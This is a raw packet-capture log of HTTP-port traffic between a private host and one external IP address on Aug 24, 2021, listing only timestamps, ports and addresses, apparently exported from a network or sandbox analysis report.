Aug 24, 2021 08:49:17.215714931 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.215730906 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.215732098 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.215745926 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.215763092 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.215779066 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.215780973 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.215795994 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.215809107 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.215814114 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.215833902 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.215852976 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.215862989 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.215864897 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.215879917 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.215897083 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.215903044 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.215913057 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.215930939 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.215946913 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.215954065 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.215964079 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.215980053 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.215990067 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.216000080 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.216013908 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.216017962 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.216037035 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.216046095 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.216053963 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.216072083 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.216083050 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.216088057 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.216104984 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.216121912 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.216131926 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.216142893 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.216161013 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.216167927 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.216177940 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.216187000 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.216196060 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.216212988 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.216222048 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.216229916 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.216247082 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.216258049 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.216264009 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.216275930 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.216293097 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.216305017 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.216309071 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.216325045 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.216339111 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.216341972 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.216362953 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.216368914 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.216381073 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.216387987 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.216398001 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.216414928 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.216423988 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.216432095 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.216449022 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.216458082 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.216469049 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.216485023 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.216497898 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.216504097 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.216521978 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.216531992 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.216538906 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.216556072 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.216564894 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.216573000 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.216595888 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.216603041 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.216613054 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.216640949 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.216859102 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.239037037 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239058018 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239070892 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239084005 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239095926 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239109993 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239139080 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239157915 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.239160061 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239178896 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239197016 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239198923 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.239214897 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239232063 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239248991 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239258051 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.239264965 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239281893 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239284039 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.239301920 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239314079 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.239320993 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239336967 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239340067 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.239356041 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239372969 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239379883 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.239388943 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239406109 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239423037 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239423037 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.239444017 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239460945 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.239463091 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239480972 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239491940 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.239500046 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239517927 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239528894 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.239537001 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239553928 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239562988 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.239567041 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239579916 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239598036 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239609003 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.239617109 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239634991 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239638090 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.239650965 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239667892 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239685059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239696026 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.239700079 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239717960 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239732981 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.239734888 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239756107 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239768028 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.239773989 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239790916 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239798069 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.239808083 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239825010 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.239829063 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239846945 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239862919 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.239866972 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239885092 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239901066 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239909887 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.239914894 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239932060 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239938974 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.239952087 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239962101 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.239970922 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.239983082 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240000963 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240008116 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.240016937 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240036964 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240055084 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.240062952 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240083933 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240091085 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.240103006 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240114927 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.240124941 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240149021 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240170002 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.240185022 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240197897 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240211010 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240226984 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240231037 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.240242958 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240258932 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240273952 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240277052 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.240295887 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240310907 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.240313053 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240329027 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240336895 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.240349054 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240364075 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.240367889 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240389109 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240403891 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240416050 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.240418911 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240436077 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240442991 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.240454912 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240473986 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240483999 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.240489960 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240506887 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240514040 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.240525961 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240546942 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240566969 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240571022 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.240587950 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240607023 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240612984 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.240622044 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240634918 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.240641117 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240658045 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240672112 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.240674019 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240691900 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240708113 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240711927 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.240722895 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240741014 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240752935 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240757942 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.240772009 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240778923 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.240787983 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240799904 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.240803957 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240820885 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240837097 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240844011 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.240858078 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240875959 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240883112 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.240895033 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240906954 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.240915060 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240936041 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240946054 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.240952015 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240972996 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.240987062 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.240993023 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.241015911 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.241023064 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.241031885 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.241050005 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.241065979 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.241077900 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.241080999 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.241096973 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.241112947 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.241121054 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.241132021 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.241147995 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.241148949 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.241164923 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.241208076 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.264441013 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.264461994 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.264480114 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.264494896 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.264497042 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.264511108 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.264528990 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.264532089 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.264544964 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.264560938 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.264568090 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.264578104 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.264594078 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.264596939 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.264614105 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.264626026 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.264631033 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.264647007 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.264662981 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.264678001 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.264678001 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.264694929 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.264710903 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.264717102 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.264730930 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.264739037 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.264749050 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.264763117 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.264764071 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.264781952 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.264791012 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.264796972 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.264811993 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.264828920 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.264834881 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.264844894 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.264863968 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.264864922 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.264882088 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.264889002 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.264898062 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.264919043 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.264935017 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.264945984 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.264950991 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.264967918 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.264983892 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.264991045 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.265003920 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265014887 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.265023947 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265031099 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.265041113 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265058041 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265069962 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.265079975 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265095949 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265114069 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265125990 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.265130043 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265144110 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265175104 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.265328884 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265347958 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265363932 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265382051 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265399933 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265408039 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.265415907 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265434027 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.265440941 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265465021 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265465975 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.265484095 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265501022 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265505075 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.265513897 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265530109 CEST	49712	80	192.168.2.5	212.224.105.79
